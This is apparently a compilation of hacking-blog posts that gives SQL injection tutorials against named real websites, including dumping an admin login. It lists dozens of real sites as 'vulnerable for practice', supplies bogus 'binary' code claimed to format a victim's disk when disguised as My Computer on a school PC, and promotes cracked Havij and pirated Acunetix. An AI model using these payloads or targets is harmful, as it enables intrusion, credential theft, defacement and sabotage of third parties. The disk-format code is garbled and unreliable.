Auto Login Script by Darky!

Hello!
I am Asman Mirza and Today I will show you something very Intresting!! ;-)

Automatic Facebook Login!

Open Notepad And Paste This!!

set w=wscript.CreateObject("wscript.shell")
w.run "firefox.exe"
wscript.sleep (7000)
w.SendKeys "{F6}"
wscript.sleep (3000)
w.SendKeys " Facebook. Com "
w.SendKeys "{ENTER}"
wscript.sleep (10000)
w.SendKeys "(Your Email Here)"
wscript.sleep (2000)
w.SendKeys "{TAB}"
w.SendKeys "(Your Password Here)"
w.SendKeys "{ENTER}"

Save This As" FacebookLogin.vbs "

Now Run The FacebookLogin.vbs And You Will Be Logged In
The Firefox Directly..

This Can Be Configured For Any
Other Website Also and For any other Browser!

Just Change "Facebook. Com" With The Website Link you want to login like TWITTER,GMAIL,HOTMAIL ect anything you want!!
and also Change Your Email And Password.

And if you want to use other Browser except Firefox then just Change The Browser By Changing " firefox.exe " in the script With your respective Browser like "Chrome.exe" "Opera.exe" "Safari.exe" etc ...

Change Browser and Website as you want but don't forget to save the script as "script.vbs".

Thanks :-)

How To Dump All Data In One Shot In Xpath Injection by Darky!!

Welcome back to TechynHacky!!
I am Asman and Today I will show you How To Dump All Data In One Shot In Xpath Injection.
So Lets starts :-)
Here Is  our Test site!! :)

""http://www.latintourdimensions.com/overview/product_detail.php?id=352""

First Found Xpath Vulnerablity Using

+and+extractvalue()--

Website will  Respond this!

[Incorrect parameter count in the call to native function 'extractvalue']

It means Website Is Vulnerable To XPATH Extractvalue Injection.!!

Okay Now Next Step :-)
Now Lets Find The Database & Version Of Database.
Here we will use this Query!

+Procedure Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -

Our Website With Query will look like this!!

http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -

Website will responce something like this :-)

[XPATH syntax error: ''BlaCkRose:5.1.54-log:LTD']

In Simple Injection We Can't Extract Database, Version, & Table, Columns, In Single Query

Okay So Now We Need Tables Of Website..
So Here is our next Query!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -

Using This Query We Can Extract All Tables Of Website From Database.
Website will look like  this with query!!

http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -

Website Responce

[XPATH syntax error: ''s,AdminLogin,Agencia,Agente,Bro']

Now We Need Columns Of Table AdminLogin,
So Lets Start!!!
Next Query!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=TABLE HEX))),1)-- -

[AdminLogin] is a Weak Table In Database,
Okay Now Convert AdminLogin into HEX Format using online tools like!!

hex.online-toolz.com/tools/text-hex-convertor.php

and Yes also if you are Using Hackbar then just  Click On [Encoding > HEX Encoding > String To 00ff00ff]

Type AdminLogin In the PoP-Up Window And Hit Enter!!
and Use Hex Format In Query Like This [0xHEX FORMAT OF THE TABLE]

Website with Query will look like this!!

http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x41646d696e4c6f67696e))),1)-- -

Website Responding this!!

[XPATH syntax error: ''id,usuario,passw']

[usuario, passw,] are Weak Columns In Table AdminLogin,
So our Next Query will be this!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column1,0x7e,column2)+from+TABLE_NAME))),1)-- -

Now replace!
TABLE_NAME = AdminLogin
COLUMN1 = usuario
COLUMN2 = passw

Now our website with Query will look like this!!

http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(usuario,0x7e,passw)+from+AdminLogin))),1)-- -

Website is respondin this!!
XPATH syntax error: ''admin~admin'

Here we got our things!! :-D
and We are Done.. :-P

Thanks for reading and Visiting :-P

Code which can Format your Enemy's Pc!

Hello TechynHacky readers! :-)
I'm Asman and Today I will tell you some cool codes using what you easily can Prank someone or take revenge!
This is for Windows OS user!

So Paste the below codes in notepad:
NOTE: You can use anothers application too,Like NOTEPAD++ etc.

0100101100011111001001010101010101

Save the file as

'Any name you want.exe'

When you open it, the hard
disk formats!

You can keep this file in
your school's computer in a
far-off folder.

At first
rename it and send a
shortcut to desktop. Now
hide the original file.
Change the icon of the
shortcut to that of My
computer and rename it as
'My Computer' and delete
the original 'My computer'.
When someone tries to
open it....
BOOOOOOOOM!!!

If you are unable to format
C drive when the victim's
PC is running, then you can
use the following line of
code:

0110011001101111011100100110110101
100000011000110011101001011100
0010000000101111010100010010111101

Save it as 'Any name you want.exe'

It's extremely cool!!!

How about making the
computer not to boot in
the first place??

Then use this code:

0110010001100101011011000010000000
101111010100110010111101010001
0010000001100011001110100101110001
101111011101000010111001101001
0110111001101001

Save it as ''Any name you want.exe'

You will be astounded at
the result when someone
tries to restart the PC!

NOTE : THIS IS JUST FOR
EDUCATIONAL PURPOSE.
So Please don't misuse it.
Do not try this at your own Pc too!

Blind SQL Injection (Full Tutorial)!

Welcome to TechynHacky :-)
Here I am Asman Mirza and Today I will show you SQLi Blind Injecting!

I mostly use ordinary SQL Injection myself but sometimes the "union" command don't work or we don't get a versions name
thats why Blind SQL Injection is important too.

So Lets start :-)

First find out victim site. Blind SQL Injections works often on ordinary SQL Injection vulnerable pages too.

Well our victim in this tut is :
http://www.vul-site.com/index.php?id=3

Testing if our Victims is vulnerable or not:

now we have to test if our victim is vulnerable for Blind SQL Injection.

add this:

    and 1 = 0

example url :
http://www.vul-site.com/index.php?id=3 and 1 = 0

now we should get a error.

¤now add this!

    and 1 = 1

example:
http://www.vul-site.com/index.php?id=3 and 1 = 1

Now we will see the website without a error message. That means that our victim is vulnerable.

Find out MySQL version:

Now you have to add and
SUBSTRING(version(),1,1)=5

if you see the website whitout a error the version is 5.
If you get a error try 4 or 3

Lets do the Injection:

The way to do the injection is a bit different to the ordinary way. We don't search for tables etc we only try to get
the password. First we try to get the first letter of the password. You will need this Asci Table .

use this

and ascii(substring((SELECT password from users limit 0,1),1,1))>70

we get a error the asci is to high lets try some lower value
try

    and ascii(substring((SELECT password from users limit 0,1),1,1))>64

no we don't get a error that means that the asci value is higher then 64
lets try 86

    and ascii(substring((SELECT password from users limit 0,1),1,1))>66

no we get a error .
That means our asci is to high. But we no that we didn't got a error at 85 that means our asci is 65.

Now check 85 in asci table.
65 means "A" that means that the first letter of our password is "A"

now we have to get the second latter.

    and ascii(substring((SELECT password from users limit 0,1),2,1))>80

result : error (to high)

    and ascii(substring((SELECT password from users limit 0,1),2,1))>75

result : no error (to low)

    and ascii(substring((SELECT password from users limit 0,1),2,1))>76

result : error

no we know that the second letter of the password is in asci 75.
Open your asci table and check which latter that is

75 = K

now we know the first two letters of the password : AK

well i think you know now how it works to get the next letters you only have to change : 2,1 into 3,1

example :

first letter : "and ascii(substring((SELECT password from users limit 0,1),1,1))>70"

second lettter : "and ascii(substring((SELECT password from users limit 0,1),2,1))>70"

third letter : "and ascii(substring((SELECT password from users limit 0,1),3,1))>70"

¤¤Thanks for Reading n Visiting :-)

How to Print your name on screen Sqli Injection!

Welcome Back to TechynHacky. :-)

I'm Asman and today I'm gonna show you "how to print your name on screen Sqli Injection" some time we need to write your name on screen to show we injected this website. anyway i hope you know about this :D
So lets start :v

Requirements:

1.Hackbar.
2.Vulnerable Website. :-)
3.Basic Knowledge of course :-P

For Example:
Here I have one. :-)

http://www.vul-site.com/events/event-detail.php?id=123

Step 1:
we need to check that the site,we chose vulnerable or not.
To check we need to put ' at the end of the website.
Like This,

http://www.vul-site.com/events/event-detail.php?id=123'

if you got any sqli error its mean this website is vulnerable so we can inject this :)
As we chose a SQLi Vulnerable site so We surely will get error. :-D

But now topic is how to print your name on screen!

Step 2:

now we need to find order number for this using this command [order by 1--+-   ]
Like this--

http://www.vul-site.com/events/event-detail.php?id=123 order by 1--+-  (no error)

http://www.vul-site.com/events/event-detail.php?id=123 order by 2--+-  (no error)

http://www.vul-site.com/events/event-detail.php?id=123 order by 10 (error)

its mean it have 9 orders. :-)

Step 3:

now replace order and go to UNION BASED and select UNION STATEMENT and enter order number.
For ex:

http://www.vul-site.com/events/event-detail.php?id=123 union all select 1,2,3,4,5,6,7,8,9,10 --+-

Now we will get vulnerable table.

Step 4:Suppose table number is 3 .

5. Now in url,replace 3 number and write some html code like this--

<font color="red" size="10"> Injected By 'Därk Légènd' </font>

Now copy this code and replace 'Därk Légènd' with your own cyber name and put it in.
Step 6: Now select all html code and go to => Encoding => HexEncoding => String to 00f00 first option.

when you are converting html code in to hexEncoding then put 0x before html code.

NOTE:
If you are using Phone or something which don't have hackbar.
Then use online tools or App/software to convert your html code to HexCoding. :-)

Step 7: Click Execute then yourname is printed there :-)

Hope you liked this :-)
Thanks for visiting and reading.. :-)

Some Sqli vulnerable website For your Practice by Darky!

Today I'm gonna tell you about some SQLi Vulnerable Site!!

Here is The 500+ Fresh SQLi Vulnerable Websites List for Practice.These sites will Help You to increase Your Skills in SQLi. :-)

http://www.smelisting.net/corner_category.php? id=15

http://www.psukhabar.com/ReadArticle.php? id=1128&table=whispers

http://www.psukhabar.com/ReadArticle.php? id=1126&table=whispers

http://www.psukhabar.com/ReadArticle.php? id=1128&table=whispers

http://www.psukhabar.com/ReadArticle.php? id=1126&table=whispers

http://www.sumava-zadov.cz/fotogalerie.php? id=9

http://geca.ac.in/departments/department.php? id=5

http://www.sandeeonline.com/ content_disp.php?id=8&cntid=36 http://deepalichains.com/product.php?id=4

http://infozee.com/tests/gre/prep-classes/ contactgre.php?id=infoedstar@gmail.com

http://www.goaunlimited.com/ display_hotels.php?id=107

http://www.sandeeonline.net/content_disp.php? id=1&cntid=50

http://www.iampl.co.in/welfare-and- celebrations.php?id=4

http://cimsmeerut.com/coursehomelist.php?id=3

http://www.goarealtors.com/rent.php?id=22

http://www.smritiindia.org/news.php?id=1

http://www.afmec.org/profile.php?id=51

http://www.digitalgoa.com/ca_disp.php?id=859

http://www.cimsmeerut.com/ coursehomelist.php?id=4

http://www.sandeeonline.com/ content_disp.php?id=8&cntid=36

http://deepalichains.com/product.php?id=4

http://infozee.com/tests/gre/prep-classes/ contactgre.php?id=infoedstar@gmail.com

http://www.smritiindia.org/news.php?id=6

http://www.goaunlimited.com/ display_hotels.php?id=107

http://www.sandeeonline.net/content_disp.php? id=1&cntid=50

http://www.iampl.co.in/welfare-and- celebrations.php?id=4

http://www.deepalichains.com/collection.php? id=1

http://www.fairwayshipping.co.in/ certification.php?id=3

http://www.fairwayshipping.co.in/ certification.php?id=2

http://www.guardianangel.in/ga/ guardian_angel_contact_profile_disp2.php? id=1442 http://kamaxi.ca/ jobdescription_manpower_recruitment_agency_ canada.php?id=80

http://infozee.com/tests/gre/prep-classes/ contactgre.php?id=infoedstar@gmail.com

http://www.smritiindia.org/news.php?id=6

http://www.goaunlimited.com/ display_hotels.php?id=107

http://www.sandeeonline.net/content_disp.php? id=1&cntid=50

http://www.iampl.co.in/welfare-and- celebrations.php?id=4

http://www.deepalichains.com/collection.php? id=1

http://www.fairwayshipping.co.in/ certification.php?id=3

http://www.fairwayshipping.co.in/ certification.php?id=2

http://www.guardianangel.in/ga/ guardian_angel_contact_profile_disp2.php? id=1442

http://kamaxi.ca/ jobdescription_manpower_recruitment_agency_ canada.php?id=80aaaaaaaaaaaaa

http://gohargroup.in/work-sectors.php?id=23

http://www.gohargroup.in/services.php?id=41

http://www.newcairoportal.com/details.php? id=137

http://www.geca.ac.in/departments/ achivement.php?id=1

http://www.harmanindia.com/products- details.php?id=163&cats=Nail%20Polish%20 Bottle%20Caps

http://www.harmanindia.com/products- details.php?id=163&cats=Nail%20Polish%20 Bottle%20Caps

http://www.strechysimon.cz/zakazka.php?id=5 http://teamaero.pjz.cz/aktuality.php?id=193

http://www.sumava-zadov.cz/fotogalerie.php? id=22

http://www.oldgame.cz/download.php?id=341

http://www.stavebni-prace-plzen.cz/pdf.php? id=9

http://www.strechysimon.cz/zakazka.php?id=27

http://www.sumava-zadov.cz/fotogalerie.php? id=9

http://www.strechysimon.cz/zakazka.php?id=5

http://teamaero.pjz.cz/aktuality.php?id=193

http://waytogonatural.com/product_detail.php? ID=45

http://wtgnatural.com/product_detail.php?ID=41

http://www.mcscom.us/index.php?id=47

http://waytogonatural.com/product_detail.php? ID=60

http://www.eriejeeppeople.com/ejpforums/ index.php?showtopic=13404 http://www.pennapalsa.org/wp-content/plugins/ download-monitor/download.php?id=23 1

http://kosh.erichshall.com/forum/index.php? topic=114.0

http://lizzieandrewborden.com/LBForum/ viewtopic.php?t=5320

http://dnb.drajv.si/index.php?topic=112.0

http://www.coulterwatch.com/slander.html

http://www.byyourcommand.net/cylonforum/ viewtopic.php?f=18&t=1197

http://www.mcscom.us/index.php?id=18

http://waytogonatural.com/product_detail.php? ID=45

http://wtgnatural.com/product_detail.php?ID=41

http://www.mcscom.us/index.php?id=47 http://waytogonatural.com/product_detail.php? ID=60

http://www.eriejeeppeople.com/ejpforums/ index.php?showtopic=13404

http://www.pennapalsa.org/wp-content/plugins/ download-monitor/download.php?id=23 1

http://kosh.erichshall.com/forum/index.php? topic=114.0

http://lizzieandrewborden.com/LBForum/ viewtopic.php?t=5320

http://dnb.drajv.si/index.php?topic=112.0

http://www.coulterwatch.com/slander.html

http://www.byyourcommand.net/cylonforum/ viewtopic.php?f=18&t=1197

http://waytogonatural.com/product_detail.php? ID=60

http://www.eriejeeppeople.com/ejpforums/ index.php?showtopic=13404

http://www.pennapalsa.org/wp-content/plugins/ download-monitor/download.php?id=23 1

http://kosh.erichshall.com/forum/index.php? topic=114.0

http://lizzieandrewborden.com/LBForum/ viewtopic.php?t=5320

http://dnb.drajv.si/index.php?topic=112.0

http://www.coulterwatch.com/slander.html

http://www.byyourcommand.net/cylonforum/ viewtopic.php?f=18&t=1197

http://www.rajahmundry.co.in/videoplay.php? id=3

http://www.ontimeengineeringenterprises.com/ singleproduct.php?id=1

http://www.rajahmundry.co.in/viewgallery.php? id=118

http://atspromoters.com/project.php?id=5

http://atspromoters.com/project.php?id=5

http://atspromoters.com/project.php?id=5

http://person.org.in/page.php?id=7:privacy- policy http://atspromoters.com/project.php?id=1

http://atspromoters.com/project.php?id=1

http://atspromoters.com/project.php?id=1

http://www.blackkingdom.in/ software_details.php?id=1

http://www.rajahmundry.co.in/videoplay.php? id=3

http://www.ontimeengineeringenterprises.com/ singleproduct.php?id=1

http://www.rajahmundry.co.in/viewgallery.php? id=118

http://atspromoters.com/project.php?id=5

http://atspromoters.com/project.php?id=5

http://atspromoters.com/project.php?id=5

http://person.org.in/page.php?id=7:privacy- policy

http://atspromoters.com/project.php?id=1

http://atspromoters.com/project.php?id=1

http://atspromoters.com/project.php?id=1

http://www.blackkingdom.in/ software_details.php?id=1

;-) enjoy :-)
Hacking with 'Därk Légènd' :-)

Tor Project:All Versions Download.

Some of you may know that You are tracked by ; The NSA, Cloudflare, Google, Twitter, Facebook and many others.

For total privacy visit using the Tor Network !!

Be Anonymous because In this world you can trust No one!! :-)

So just be the Ghost of Internet ;-)

For Downloading TOR Project,all version!
                   VISIT HERE!!

Thanks :-)

Download Acunetix Web Vulnerability Scanner For Professional!!

Acunetix Web Vulnerability Scanner provides a comprehensive environment to automatically scan a website for vulnerabilities.
It scans the web application as well as the web server.
Once Acunetix identifies the vulnerabilities in the website, you can go ahead and exploit it manually or use any of the other tools in this list.

Acunetix is however, a paid software, but if you are resourceful,you will know where to get it for free.

DOWNLOAD IT FROM HERE☜

After Sucessfully vist ti Acunetix Websir subscribe with your Email And Start Downloading!! :-)

NOTE:
If you Do not subscribed with your own Email Then You Are Not Able to download Acunetix vulnerable software.

Thanks For Reading :-)

For any kinda help contact me or comment below!! :-)

Download Havij v 1.15 Pro | Advanced Automated SQL Injection + license by Asman Mirza

----------How to Use!----------

This tool is for exploiting SQL Injection bugs in web application.
For using this tool you should know a little about SQL Injections.
Enter target url and select http method then click Analyze.

Note: Try to url be valid input that returns a normal page not a 404 or error page.

---------;What's New?----------

Version 1.15
2011/06/08 -Webknight WAF bypass added.
-Bypassing mod_security made better
-Unicode support added
-A new method for tables/columns extraction in mssql
-Continuing previous tables/columns extraction made available
-Custom replacement added to the settings
-Default injection value added to the settings (when using %Inject_Here%)
-Table and column prefix added for blind injections
-Custom table and column list added.
-Custom time out added.
-A new md5 cracker site added
-bugfix: a bug releating to SELECT command
-bugfix: finding string column
-bugfix: getting multi column data in mssql
-bugfix: finding mysql column count
-bugfix: wrong syntax in injection string type in MsAccess
-bugfix: false positive results was removed
-bugfix: data extraction in url
-encoded pages
-bugfix: loading saved projects
-bugfix: some errors in data extraction in mssql fixed.
-bugfix: a bug in MsAccess when guessing tables and columns
-bugfix: a bug when using proxy
-bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
-bugfix: false positive in finding columns count
-bugfix: when mssql error based method failed
-bugfix: a bug in saving data
-bugfix: Oracle and PostgreSQL detection

----------Instructions---------

1.Run Havij.exe

2. Once it opens you will see register..

3. Click Register Make sure you are connected to the internet

4. Under Name: You write: Cracked@By.Exidous

5. Under File: You select the folder where you are currently running the Havij program from and select Havij Key

6. Done!!! :-)

!!DOWNLOAH FROM HERE!!